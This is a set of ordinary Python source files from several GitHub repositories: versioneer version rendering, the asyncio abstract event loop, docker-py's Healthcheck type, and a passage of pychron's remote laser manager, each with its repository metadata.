"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|
{
"content_hash": "1376c6d562e0731427752ed9568aaf31",
"timestamp": "",
"source": "github",
"line_count": 510,
"max_line_length": 79,
"avg_line_length": 35.24313725490196,
"alnum_prop": 0.5696561700233671,
"repo_name": "cdiener/micom",
"id": "1722947cc151adebe4fd3e4f7725dc4a05900397",
"size": "18449",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "micom/_version.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Python",
"bytes": "156032"
}
],
"symlink_target": ""
}
|
"""Event loop and event loop policy."""
__all__ = ['AbstractEventLoopPolicy',
'AbstractEventLoop', 'AbstractServer',
'Handle', 'TimerHandle',
'get_event_loop_policy', 'set_event_loop_policy',
'get_event_loop', 'set_event_loop', 'new_event_loop',
'get_child_watcher', 'set_child_watcher',
]
import subprocess
import threading
import socket
class Handle:
"""Object returned by callback registration methods."""
__slots__ = ['_callback', '_args', '_cancelled', '_loop']
def __init__(self, callback, args, loop):
assert not isinstance(callback, Handle), 'A Handle is not a callback'
self._loop = loop
self._callback = callback
self._args = args
self._cancelled = False
def __repr__(self):
res = 'Handle({}, {})'.format(self._callback, self._args)
if self._cancelled:
res += '<cancelled>'
return res
def cancel(self):
self._cancelled = True
def _run(self):
try:
self._callback(*self._args)
except Exception as exc:
msg = 'Exception in callback {}{!r}'.format(self._callback,
self._args)
self._loop.call_exception_handler({
'message': msg,
'exception': exc,
'handle': self,
})
self = None # Needed to break cycles when an exception occurs.
class TimerHandle(Handle):
"""Object returned by timed callback registration methods."""
__slots__ = ['_when']
def __init__(self, when, callback, args, loop):
assert when is not None
super().__init__(callback, args, loop)
self._when = when
def __repr__(self):
res = 'TimerHandle({}, {}, {})'.format(self._when,
self._callback,
self._args)
if self._cancelled:
res += '<cancelled>'
return res
def __hash__(self):
return hash(self._when)
def __lt__(self, other):
return self._when < other._when
def __le__(self, other):
if self._when < other._when:
return True
return self.__eq__(other)
def __gt__(self, other):
return self._when > other._when
def __ge__(self, other):
if self._when > other._when:
return True
return self.__eq__(other)
def __eq__(self, other):
if isinstance(other, TimerHandle):
return (self._when == other._when and
self._callback == other._callback and
self._args == other._args and
self._cancelled == other._cancelled)
return NotImplemented
def __ne__(self, other):
equal = self.__eq__(other)
return NotImplemented if equal is NotImplemented else not equal
class AbstractServer:
"""Abstract server returned by create_server()."""
def close(self):
"""Stop serving. This leaves existing connections open."""
return NotImplemented
def wait_closed(self):
"""Coroutine to wait until service is closed."""
return NotImplemented
class AbstractEventLoop:
"""Abstract event loop."""
# Running and stopping the event loop.
def run_forever(self):
"""Run the event loop until stop() is called."""
raise NotImplementedError
def run_until_complete(self, future):
"""Run the event loop until a Future is done.
Return the Future's result, or raise its exception.
"""
raise NotImplementedError
def stop(self):
"""Stop the event loop as soon as reasonable.
Exactly how soon that is may depend on the implementation, but
no more I/O callbacks should be scheduled.
"""
raise NotImplementedError
def is_running(self):
"""Return whether the event loop is currently running."""
raise NotImplementedError
def close(self):
"""Close the loop.
The loop should not be running.
This is idempotent and irreversible.
No other methods should be called after this one.
"""
raise NotImplementedError
# Methods scheduling callbacks. All these return Handles.
def call_soon(self, callback, *args):
return self.call_later(0, callback, *args)
def call_later(self, delay, callback, *args):
raise NotImplementedError
def call_at(self, when, callback, *args):
raise NotImplementedError
def time(self):
raise NotImplementedError
# Methods for interacting with threads.
def call_soon_threadsafe(self, callback, *args):
raise NotImplementedError
def run_in_executor(self, executor, callback, *args):
raise NotImplementedError
def set_default_executor(self, executor):
raise NotImplementedError
# Network I/O methods returning Futures.
def getaddrinfo(self, host, port, *, family=0, type=0, proto=0, flags=0):
raise NotImplementedError
def getnameinfo(self, sockaddr, flags=0):
raise NotImplementedError
def create_connection(self, protocol_factory, host=None, port=None, *,
ssl=None, family=0, proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None):
raise NotImplementedError
def create_server(self, protocol_factory, host=None, port=None, *,
family=socket.AF_UNSPEC, flags=socket.AI_PASSIVE,
sock=None, backlog=100, ssl=None, reuse_address=None):
"""A coroutine which creates a TCP server bound to host and port.
The return value is a Server object which can be used to stop
the service.
If host is an empty string or None all interfaces are assumed
and a list of multiple sockets will be returned (most likely
one for IPv4 and another one for IPv6).
family can be set to either AF_INET or AF_INET6 to force the
socket to use IPv4 or IPv6. If not set it will be determined
from host (defaults to AF_UNSPEC).
flags is a bitmask for getaddrinfo().
sock can optionally be specified in order to use a preexisting
socket object.
backlog is the maximum number of queued connections passed to
listen() (defaults to 100).
ssl can be set to an SSLContext to enable SSL over the
accepted connections.
reuse_address tells the kernel to reuse a local socket in
TIME_WAIT state, without waiting for its natural timeout to
expire. If not specified will automatically be set to True on
UNIX.
"""
raise NotImplementedError
def create_unix_connection(self, protocol_factory, path, *,
ssl=None, sock=None,
server_hostname=None):
raise NotImplementedError
def create_unix_server(self, protocol_factory, path, *,
sock=None, backlog=100, ssl=None):
"""A coroutine which creates a UNIX Domain Socket server.
The return value is a Server object, which can be used to stop
the service.
path is a str, representing a file systsem path to bind the
server socket to.
sock can optionally be specified in order to use a preexisting
socket object.
backlog is the maximum number of queued connections passed to
listen() (defaults to 100).
ssl can be set to an SSLContext to enable SSL over the
accepted connections.
"""
raise NotImplementedError
def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0):
raise NotImplementedError
# Pipes and subprocesses.
def connect_read_pipe(self, protocol_factory, pipe):
"""Register read pipe in event loop.
protocol_factory should instantiate object with Protocol interface.
pipe is file-like object already switched to nonblocking.
Return pair (transport, protocol), where transport support
ReadTransport interface."""
# The reason to accept file-like object instead of just file descriptor
# is: we need to own pipe and close it at transport finishing
# Can got complicated errors if pass f.fileno(),
# close fd in pipe transport then close f and vise versa.
raise NotImplementedError
def connect_write_pipe(self, protocol_factory, pipe):
"""Register write pipe in event loop.
protocol_factory should instantiate object with BaseProtocol interface.
Pipe is file-like object already switched to nonblocking.
Return pair (transport, protocol), where transport support
WriteTransport interface."""
# The reason to accept file-like object instead of just file descriptor
# is: we need to own pipe and close it at transport finishing
# Can got complicated errors if pass f.fileno(),
# close fd in pipe transport then close f and vise versa.
raise NotImplementedError
def subprocess_shell(self, protocol_factory, cmd, *, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs):
raise NotImplementedError
def subprocess_exec(self, protocol_factory, *args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs):
raise NotImplementedError
# Ready-based callback registration methods.
# The add_*() methods return None.
# The remove_*() methods return True if something was removed,
# False if there was nothing to delete.
def add_reader(self, fd, callback, *args):
raise NotImplementedError
def remove_reader(self, fd):
raise NotImplementedError
def add_writer(self, fd, callback, *args):
raise NotImplementedError
def remove_writer(self, fd):
raise NotImplementedError
# Completion based I/O methods returning Futures.
def sock_recv(self, sock, nbytes):
raise NotImplementedError
def sock_sendall(self, sock, data):
raise NotImplementedError
def sock_connect(self, sock, address):
raise NotImplementedError
def sock_accept(self, sock):
raise NotImplementedError
# Signal handling.
def add_signal_handler(self, sig, callback, *args):
raise NotImplementedError
def remove_signal_handler(self, sig):
raise NotImplementedError
# Error handlers.
def set_exception_handler(self, handler):
raise NotImplementedError
def default_exception_handler(self, context):
raise NotImplementedError
def call_exception_handler(self, context):
raise NotImplementedError
# Debug flag management.
def get_debug(self):
raise NotImplementedError
def set_debug(self, enabled):
raise NotImplementedError
class AbstractEventLoopPolicy:
"""Abstract policy for accessing the event loop."""
def get_event_loop(self):
"""XXX"""
raise NotImplementedError
def set_event_loop(self, loop):
"""XXX"""
raise NotImplementedError
def new_event_loop(self):
"""XXX"""
raise NotImplementedError
# Child processes handling (Unix only).
def get_child_watcher(self):
"""XXX"""
raise NotImplementedError
def set_child_watcher(self, watcher):
"""XXX"""
raise NotImplementedError
class BaseDefaultEventLoopPolicy(AbstractEventLoopPolicy):
"""Default policy implementation for accessing the event loop.
In this policy, each thread has its own event loop. However, we
only automatically create an event loop by default for the main
thread; other threads by default have no event loop.
Other policies may have different rules (e.g. a single global
event loop, or automatically creating an event loop per thread, or
using some other notion of context to which an event loop is
associated).
"""
_loop_factory = None
class _Local(threading.local):
_loop = None
_set_called = False
def __init__(self):
self._local = self._Local()
def get_event_loop(self):
"""Get the event loop.
This may be None or an instance of EventLoop.
"""
if (self._local._loop is None and
not self._local._set_called and
isinstance(threading.current_thread(), threading._MainThread)):
self.set_event_loop(self.new_event_loop())
assert self._local._loop is not None, \
('There is no current event loop in thread %r.' %
threading.current_thread().name)
return self._local._loop
def set_event_loop(self, loop):
"""Set the event loop."""
self._local._set_called = True
assert loop is None or isinstance(loop, AbstractEventLoop)
self._local._loop = loop
def new_event_loop(self):
"""Create a new event loop.
You must call set_event_loop() to make this the current event
loop.
"""
return self._loop_factory()
# Event loop policy. The policy itself is always global, even if the
# policy's rules say that there is an event loop per thread (or other
# notion of context). The default policy is installed by the first
# call to get_event_loop_policy().
_event_loop_policy = None
# Lock for protecting the on-the-fly creation of the event loop policy.
_lock = threading.Lock()
def _init_event_loop_policy():
global _event_loop_policy
with _lock:
if _event_loop_policy is None: # pragma: no branch
from . import DefaultEventLoopPolicy
_event_loop_policy = DefaultEventLoopPolicy()
def get_event_loop_policy():
"""XXX"""
if _event_loop_policy is None:
_init_event_loop_policy()
return _event_loop_policy
def set_event_loop_policy(policy):
"""XXX"""
global _event_loop_policy
assert policy is None or isinstance(policy, AbstractEventLoopPolicy)
_event_loop_policy = policy
def get_event_loop():
"""XXX"""
return get_event_loop_policy().get_event_loop()
def set_event_loop(loop):
"""XXX"""
get_event_loop_policy().set_event_loop(loop)
def new_event_loop():
"""XXX"""
return get_event_loop_policy().new_event_loop()
def get_child_watcher():
"""XXX"""
return get_event_loop_policy().get_child_watcher()
def set_child_watcher(watcher):
"""XXX"""
return get_event_loop_policy().set_child_watcher(watcher)
|
{
"content_hash": "77ee1101105fbad9858f887ddb3c6775",
"timestamp": "",
"source": "github",
"line_count": 485,
"max_line_length": 79,
"avg_line_length": 30.8,
"alnum_prop": 0.6180211541036283,
"repo_name": "leetreveil/tulip",
"id": "57af68afb641b243b104ccc038597b073012d33f",
"size": "14938",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "asyncio/events.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "38501"
},
{
"name": "Python",
"bytes": "779115"
},
{
"name": "Shell",
"bytes": "1223"
}
],
"symlink_target": ""
}
|
from .base import DictType
import six
class Healthcheck(DictType):
"""
Defines a healthcheck configuration for a container or service.
Args:
test (:py:class:`list` or str): Test to perform to determine
container health. Possible values:
- Empty list: Inherit healthcheck from parent image
- ``["NONE"]``: Disable healthcheck
- ``["CMD", args...]``: exec arguments directly.
- ``["CMD-SHELL", command]``: RUn command in the system's
default shell.
If a string is provided, it will be used as a ``CMD-SHELL``
command.
interval (int): The time to wait between checks in nanoseconds. It
should be 0 or at least 1000000 (1 ms).
timeout (int): The time to wait before considering the check to
have hung. It should be 0 or at least 1000000 (1 ms).
retries (integer): The number of consecutive failures needed to
consider a container as unhealthy.
start_period (integer): Start period for the container to
initialize before starting health-retries countdown in
nanoseconds. It should be 0 or at least 1000000 (1 ms).
"""
def __init__(self, **kwargs):
test = kwargs.get('test', kwargs.get('Test'))
if isinstance(test, six.string_types):
test = ["CMD-SHELL", test]
interval = kwargs.get('interval', kwargs.get('Interval'))
timeout = kwargs.get('timeout', kwargs.get('Timeout'))
retries = kwargs.get('retries', kwargs.get('Retries'))
start_period = kwargs.get('start_period', kwargs.get('StartPeriod'))
super(Healthcheck, self).__init__({
'Test': test,
'Interval': interval,
'Timeout': timeout,
'Retries': retries,
'StartPeriod': start_period
})
@property
def test(self):
return self['Test']
@test.setter
def test(self, value):
self['Test'] = value
@property
def interval(self):
return self['Interval']
@interval.setter
def interval(self, value):
self['Interval'] = value
@property
def timeout(self):
return self['Timeout']
@timeout.setter
def timeout(self, value):
self['Timeout'] = value
@property
def retries(self):
return self['Retries']
@retries.setter
def retries(self, value):
self['Retries'] = value
@property
def start_period(self):
return self['StartPeriod']
@start_period.setter
def start_period(self, value):
self['StartPeriod'] = value
|
{
"content_hash": "06eb8f988cc750d45d22060727866970",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 78,
"avg_line_length": 31.25,
"alnum_prop": 0.5698181818181818,
"repo_name": "vpetersson/docker-py",
"id": "61857c21ce13f237bd914d6b3e97059eaca081e5",
"size": "2750",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "docker/types/healthcheck.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "3260"
},
{
"name": "Python",
"bytes": "868992"
},
{
"name": "Shell",
"bytes": "749"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
from __future__ import print_function
import os
import time
from threading import Thread
import six
import six.moves.cPickle as pickle
# ============= enthought library imports =======================
from traits.api import (
Str,
String,
on_trait_change,
Float,
Property,
Instance,
Event,
Enum,
Int,
Either,
Range,
cached_property,
)
from pychron import json
# ============= local library imports ==========================
from pychron.core.helpers.strtools import to_bool, csv_to_floats
from pychron.envisage.view_util import open_view
from pychron.globals import globalv
from pychron.hardware import get_float, get_blob
from pychron.lasers.laser_managers.ethernet_laser_manager import EthernetLaserManager
from pychron.paths import paths
class PychronLaserManager(EthernetLaserManager):
"""
A PychronLaserManager is used to control an instance of
pychron remotely.
Common laser functions such as enable_laser are converted to
the RemoteHardwareServer equivalent and sent by the communicator
e.g enable_laser ==> self.communicator.ask('Enable')
The communicators connection arguments are set in initialization.xml
use a communicator block
<plugin enabled="true" fire_mode="client">FusionsDiode
...
<communications>
<host>129.138.12.153</host>
<port>1069</port>
<kind>UDP</kind>
</communications>
</plugin>
"""
# communicator = None
# port = CInt
# host = Str
stage_manager_id = "fusions.pychron"
_cancel_blocking = False
mode = "client"
optics_client = Instance("pychron.lasers.laser_managers.client.LaserOpticsClient")
controls_client = Instance(
"pychron.lasers.laser_managers.client.LaserControlsClient"
)
# def shutdown(self):
# if self.communicator:
# self.communicator.close()
def bind_preferences(self, pref_id):
from apptools.preferences.preference_binding import bind_preference
bind_preference(self, "use_video", "{}.use_video".format(pref_id))
self.stage_manager.bind_preferences(pref_id)
# def open(self):
# host = self.host
# port = self.port
#
# self.communicator = ec = EthernetCommunicator(host=host,
# port=port)
# r = ec.open()
# if r:
# self.connected = True
# self.opened()
#
# return r
# self.trait_set(**dict(zip(('_x', '_y', '_z'),
# self.get_position())))
def get_tray(self):
return self._ask("GetSampleHolder")
def get_error(self):
error = self._ask("GetError")
if error is None:
error = "Get Error Failed"
return error
# ===============================================================================
# patterning
# ===============================================================================
def execute_pattern(self, name=None, block=False, duration=None):
"""
name is either a name of a file
of a pickled pattern obj
"""
if name:
self._patterning = True
self._execute_pattern(name, block, duration)
if block:
self._patterning = False
def stop_pattern(self):
self._ask("AbortPattern")
self._patterning = False
def get_pattern_names(self):
# get contents of local pattern_dir
# ps = super(PychronLaserManager, self).get_pattern_names()
ps = []
# get contents of remote pattern_dir
pn = self._ask("GetJogProcedures")
if pn:
ps.extend(pn.split(","))
return ps
# ===============================================================================
# pyscript commands
# ===============================================================================
def wake(self):
self._ask("WakeScreen")
def set_light(self, value):
self._ask("SetLight {}".format(value))
def acquire_grain_polygon(self):
return self._ask("AcquireGrainPolygonBlob")
def start_measure_grain_polygon(self):
return self._ask("StartMeasureGrainPolygon")
def stop_measure_grain_polygon(self):
return self._ask("StopMeasureGrainPolygon")
def get_grain_polygon_blob(self):
blobs = []
if globalv.laser_version > 0:
while 1:
blob = self._ask("GetGrainPolygonBlob")
if blob:
if blob == "No Response":
break
blobs.append(blob)
else:
break
return blobs
@get_blob()
def get_response_blob(self):
return self._ask("GetResponseBlob", verbose=True)
@get_blob()
def get_output_blob(self):
"""
needs to return bytes. GetOutputBlob sends a b64encoded string
:return:
"""
return self._ask("GetOutputBlob")
@get_float(default=0)
def get_achieved_output(self):
return self._ask("GetAchievedOutput")
@get_float(default=0)
def get_pyrometer_temperature(self):
return self._ask("GetPyrometerTemperature")
# def do_machine_vision_degas(self, lumens, duration):
# if lumens and duration:
# self.info('Doing machine vision degas. lumens={}'.format(lumens))
# self._ask('MachineVisionDegas {},{}'.format(lumens, duration))
# else:
# self.debug('lumens and duration not set {}, {}'.format(lumens, duration))
def start_video_recording(self, name):
self.info("Start Video Recording")
cmd = {"command": "StartVideoRecording", "name": name}
self._ask(json.dumps(cmd))
def stop_video_recording(self):
self.info("Stop Video Recording")
return self._ask("StopVideoRecording")
def take_snapshot(self, name, pic_format, view_snapshot=False):
self.info("Take snapshot")
resp = self._ask("Snapshot {},{}".format(name, pic_format))
if resp:
args = self._convert_snapshot_response(resp)
if view_snapshot:
self._view_snapshot(*args)
return args
def prepare(self):
self.info("Prepare laser")
self._ask("Prepare")
cnt = 0
tries = 0
maxtries = 200 # timeout after 50 s
if globalv.experiment_debug:
maxtries = 1
nsuccess = 1
self._cancel_blocking = False
ask = self._ask
period = 1
cmd = "IsReady"
while tries < maxtries and cnt < nsuccess:
if self._cancel_blocking:
break
time.sleep(period)
resp = ask(cmd)
if resp is not None:
try:
if to_bool(resp):
cnt += 1
except:
cnt = 0
else:
cnt = 0
tries += 1
return cnt >= nsuccess
def end_extract(self, *args, **kw):
self.info("ending extraction. set laser power to 0")
self.set_laser_power(0)
if self._patterning:
self.stop_pattern()
def extract(self, value, units="", process=None, **kw):
self.info("set laser output")
cmd = {"command": "SetLaserOutput", "value": value, "units": units}
return self._ask(json.dumps(cmd)) == "OK"
# return self._ask('SetLaserOutput {},{},{}'.format(value, units)) == 'OK'
def enable_laser(self, *args, **kw):
self.info("enabling laser")
return self._ask("Enable") == "OK"
def disable_laser(self, *args, **kw):
self.info("disabling laser")
return self._ask("Disable") == "OK"
def set_laser_power(self, v, *args, **kw):
self.info("set laser power {}".format(v))
return self._ask("SetLaserPower {}".format(v)) == "OK"
def set_motor_lock(self, name, value):
v = "YES" if value else "NO"
self.info("set motor {} lock to {}".format(name, v))
self._ask("SetMotorLock {},{}".format(name, int(value)))
return True
def set_motor(self, name, value):
self.info("set motor {} to {}".format(name, value))
self._ask("SetMotor {},{}".format(name, value))
time.sleep(0.5)
r = self._block(cmd="GetMotorMoving {}".format(name))
return r
def get_position(self):
xyz = self._ask("GetPosition")
if xyz:
try:
x, y, z = csv_to_floats(xyz)
return x, y, z
except Exception as e:
print("pychron laser manager get_position", e)
return 0, 0, 0
if self.communicator.simulation:
return 0, 0, 0
# handlers
# @on_trait_change('pattern_executor:pattern:canceled')
# def pattern_canceled(self):
# """
# this patterning window was closed so cancel the blocking loop
# """
# self._cancel_blocking = True
def _pattern_executor_init_hook(self, pm):
def handle():
self._cancel_blocking = True
pm.on_trait_change(handle, "pattern:canceled")
def _snapshot_button_fired(self):
self.take_snapshot("test", view_snapshot=True)
def _execute_pattern(self, pat, block, duration):
self.info("executing pattern {}".format(pat))
if not pat.endswith(".lp"):
pat = "{}.lp".format(pat)
path = os.path.join(paths.pattern_dir, pat)
if os.path.isfile(path):
self.debug("Using local pattern {}".format(pat))
pat = pickle.dumps(path)
self.debug("Sending Pattern:{}".format(pat))
self.debug("-------- laser version {}".format(globalv.laser_version))
if globalv.laser_version > 0:
cmd = {"command": "DoPattern", "name": pat, "duration": duration}
cmd = json.dumps(cmd)
else:
cmd = "DoPattern {}".format(pat)
self._ask(cmd, verbose=True)
if block:
time.sleep(0.5)
if not self._block("IsPatterning", period=1, timeout=100):
self._ask("AbortPattern")
# ===============================================================================
# pyscript private
# ===============================================================================
def _view_snapshot(self, local_path, remote_path, image):
from pychron.lasers.laser_managers.snapshot_view import SnapshotView
open_required = False
try:
sv = self.application.snapshot_view
except AttributeError:
sv = None
open_required = True
if sv is None:
sv = SnapshotView()
self.application.snapshot_view = sv
sv.set_image(local_path, remote_path, image)
if open_required:
info = open_view(sv)
self.application.snapshot_view_info = info
else:
if self.application.snapshot_view_info.control:
self.application.snapshot_view_info.control.raise_()
else:
info = open_view(sv)
self.application.snapshot_view_info = info
def _convert_snapshot_response(self, ps):
"""
ps = XXlpathYYrpathimageblob
where XX,YY is the len of the following path
convert ps to a tuple
"""
l = int(ps[:2], 16)
e1 = 2 + l
s1 = ps[2:e1]
e2 = e1 + 2
e3 = e2 + int(ps[e1:e2], 16)
s2 = ps[e2:e3]
s3 = ps[e3:]
self.debug("image len {}".format(len(s3)))
return s1, s2, s3
def _move_to_position(self, pos, autocenter, block):
cmd = "GoToHole {},{}".format(pos, autocenter)
if isinstance(pos, tuple):
cmd = "SetXY {}".format(pos[:2])
# if len(pos) == 3:
# cmd = 'SetZ {}'.format(pos[2])
self.info("sending {}".format(cmd))
self._ask(cmd)
time.sleep(0.5)
r = self._block(nsuccess=3, period=0.5)
time.sleep(0.5)
if autocenter and block:
r = self._block(cmd="GetAutoCorrecting", period=0.5)
self._ask("CancelAutoCorrecting")
self.update_position()
return r
# def _ask(self, cmd, **kw):
# # self.communicator.get_handler()
# return self.communicator.ask(cmd, **kw)
def _set_x(self, v):
if self._move_enabled:
self._ask("SetX {}".format(v))
self.update_position()
def _set_y(self, v):
if self._move_enabled:
self._ask("SetY {}".format(v))
self.update_position()
def _set_z(self, v):
if self._move_enabled:
self._ask("SetZ {}".format(v))
self.update_position()
# defaults
def _stage_manager_default(self):
name = self.name.lower()
if "fusions" in name:
nn = name[7:]
name = "fusions_{}".format(nn)
args = dict(
name="stage",
configuration_name="stage",
# configuration_dir_name = self.configuration_dir_name,
configuration_dir_name=name,
parent=self,
)
return self._stage_manager_factory(args)
def _controls_client_default(self):
from pychron.lasers.laser_managers.client import LaserControlsClient
return LaserControlsClient(parent=self)
def _optics_client_default(self):
from pychron.lasers.laser_managers.client import LaserOpticsClient
return LaserOpticsClient(parent=self)
class PychronUVLaserManager(PychronLaserManager):
optics_client = Instance("pychron.lasers.laser_managers.client.UVLaserOpticsClient")
controls_client = Instance(
"pychron.lasers.laser_managers.client.UVLaserOpticsClient"
)
fire = Event
stop = Event
fire_mode = Enum("Burst", "Continuous")
nburst = Property(depends_on="_nburst")
_nburst = Int
mask = Property(String(enter_set=True, auto_set=False), depends_on="_mask")
_mask = Either(Str, Float)
masks = Property
attenuator = String(enter_set=True, auto_set=False)
# attenuators = Property
zoom = Range(0.0, 100.0)
def set_reprate(self, v):
self._ask("SetReprate {}".format(v))
def extract(self, power, **kw):
self._set_nburst(power)
time.sleep(0.25)
self._ask("Fire burst")
time.sleep(0.25)
self._block("IsFiring", period=0.5)
def end_extract(self):
self._ask("Fire stop")
def trace_path(self, value, name, kind):
if isinstance(name, list):
name = name[0]
# traces need to be prefixed with 'l'
name = str(name)
name = name.lower()
# if not name.startswith('l'):
# name = 'l{}'.format(name)
